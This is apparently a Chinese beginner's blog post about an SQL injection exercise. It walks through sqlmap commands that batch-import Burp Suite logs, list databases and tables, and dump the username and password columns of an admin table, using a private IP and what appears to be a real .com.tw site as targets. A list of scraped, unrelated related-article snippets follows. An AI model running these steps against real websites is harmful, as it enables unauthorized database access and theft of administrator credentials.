获取网站管理员账户密码?
最近学长让用sqlmap获取一个网站的管理员账户和密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是攻破,总之就是入门嘛。
SQL注入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
首先sqlmap据说是一个开源的,很强大的,集检测和利用注入点于一身的工具,有python语言开发,用之前得装python环境。说是有检测功能但是并不能直接扫描网站找到注入点,但是可以批量导入,就是省了你的麻烦。但是说一体化好像牵强了一点。
至于批量导入这里借用一个大佬的方法,就是借用burpsuite的日志文件批量导入,
配置burpsuite下记录所有的request记录,并保存在指定文件夹,指定在sqlmap的目录下,然后python sqlmap.py -l 文件名 --batch -smart
sqlmap就能批量导入burp的log文件了--batch指默认都选yes,,-smart指启发式快速判断,节约时间。
最后能注入的url会保存到out文件夹下
注意:log文件中如果有sqlmap无法读取的字符(ascii码之外的字符)会读取失败。
找注入点的工具还是啊d名小子啥的比较方便,而且这些工具才真是一体化,感觉比sqlmap简单的多。
而手工找注入点,,,主要是根据返回值的不同,这里就不说了,有个工具多好(所以说有些人感觉很厉害,可能是人家工具到位,并不一定是技术很强,大佬,请自动忽略)
既然找到注入点了,一般就不用测试了,但是还是列一下
sqlmap -u "http://192.168.1.150/products.asp?id=134"
因为我这是linux系统所以直接调用,windows:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"
一般会扫描出数据库管理器的类型和操作系统啥的
接下来我就按linux来了。。
列出数据库
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
有时候可能会提示不成功,我学长给我的直接没有数据库,因为acc只有表,,,这就很尴尬,,
就是说没有数据库,试试只用--tables即列出表名
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --tables
如果有数据库的话 加-D 数据库名
列表名有时候也不会成功,它会提示你是否用常规方法啥的,输y就对了,他用的方法好像是试错法,,具体你一试就知道了。
接着就是列字段,和列出指定字段了
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin --column
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin -C username,password --dump
导出后密码一般都不是明文,MD5啥的加密。。完事
至于后来用御剑啥的扫描登陆啥的就简单了
sqlmap命令补充:
参数:
--current-db列出当前使用数据库
--current-user当前用户
--user 列出所有用户
--password列出密码
PS:批量导入大佬的原文https://www.cnblogs.com/qmfsun/p/5654192.html
获取网站管理员账户密码?相关推荐
- 给网站管理员的建议:创建可利用的、可抓取的网站
转载自 谷歌中文网站管理员博客 发表者 T.V. Raman,研究学者 原文: Webmaster tips for creating accessible, crawlable sites 发表于: ...
- 面向Web开发人员和网站管理员的Web缓存指南
这是一篇知识性的文档,主要目的是为了让Web缓存相关概念更容易被开发者理解并应用于实际的应用环境中.为了简要起见,某些实现方面的细节被简化或省略了.如果你更关心细节实现则完全不必耐心看完本文,后面参考 ...
- 获取网站后台权限理解
文章目录 一.后台常见位置查找 1.1 猜解常用路径 1.2 robots.txt 1.3 访问报错页面 1.4 查看图片相关属性 1.5 CMS指纹识别 1.6 利用谷歌黑语法来查找 二.利用工具查 ...
- alexa api php,PHP通过Alexa官方API获取网站Alexa排名 - 米扑博客
Alexa 接口 Alexa的XML API接口是:http://data.alexa.com/data?cli=10&url=YOUR_DOMAIN_URL 查询结果如下: 如果想获取更多的 ...
- seo同义词替换在线工具_8个免费的网站管理员在线SEO工具
seo同义词替换在线工具 There are some great tools available to help webmasters with their SEO. Unfortunately, ...
- WEB自动化(5)获取网站验证码即从验证码截图中获取图片中的字符串
WEB自动化(1)环境安装及打开浏览器实例 WEB自动化(2)常用的元素定位方法之xpath详解 WEB自动化(3)PO设计模式原理与实现 WEB自动化(4)使用selenium将网站验证码截图保存为 ...
- 植入木马获取网站权限
获取网站权限 首先获得需操作网址(下面演示的是学校练习靶机) 打开网址,利用上篇所讲知识得到后台管理员权限,登入后台管理 随机寻找可注入点,找到注入点根目录位置 如图,这个就是随机找到的可植入木马位置 ...
- 怎样获取网站的域名_搭建一个网站,通常的6大步骤你知道吗?
怎样建网站?要搭建一个网站,通常有6个步骤.下面我们简单的介绍如何一步一步搭建网站. 第一步:注册域名 挑选网站地址,注册专属域名.注册域名的价格取决于具体用什么样的后缀域名搭建网站.目前可以选择的域 ...
- curl用法:获取网站的header头及状态码
curl命令最常用的方法是使用参数-I 获取域名或IP的header信息,包括HTTP返回状态码,server类型,文本类型,缓存时间等等:监控web服务时也常用此方法判断web服务是否正常: 监控w ...
最新文章
- SAP PI 集成引擎
- 使用java9的uuid生成方式,让uuid生成速度提升一个档次...
- 在WinRT中读取资源文件
- netcore更新dll要停止_使 .NET Core 应用程序容器化
- 2016年第6本:简约至上--交互式设计四策略
- flask找不到css_Flask干货:访问数据库——Flask-SQLAlchemy初始化
- 《Java和Android开发学习指南(第2版)》——第2章,第2.10节本章小结
- 很多人在销售过程中,喜欢考虑用一些话术
- 《图像语义分析》学习笔记 (二)
- Java设计模式-代理模式
- VAssistX 常用快捷键 (常用好用)
- tenda无线网卡Linux驱动,Ubuntu 10.04上腾达W541U V2.0 无线网卡驱动的使用
- 霍尔编码器和电机驱动L298N
- 常见文件文件头文件尾格式总结及各类文件头
- 大数据技术架构_大数据架构流程图
- ImageNet数据集 下载
- neo4j图数据库--Cypher入门
- 人工智能技术中的科学性与艺术性
- 客户说:在忙,回头联系你。如何话术应对呢?
- java找不到或无法加载主类
热门文章
- Java数据库连接(JDBC)之连接失败问题汇总
- 兴趣部落打通微信公众号,两大平台联手优化兴趣社交体验
- APM飞控学习之路:2 四旋翼的工作原理与系统组成
- 服务器跑网站用nigx还是apache,Apache和IIS及nginx三大web服务器,新手站长该如何选择?...
- linux cp -b,Linux命令学习之Linux cp命令
- 深入浅出JMS(一)–JMS基本概念(转载)
- html span标签详解
- 用html4绘制海豚,小海豚怎么画?六步教你画一只可爱的海豚
- pycharm html 注释
- 复位测试激励verilog HDL实例(写法3)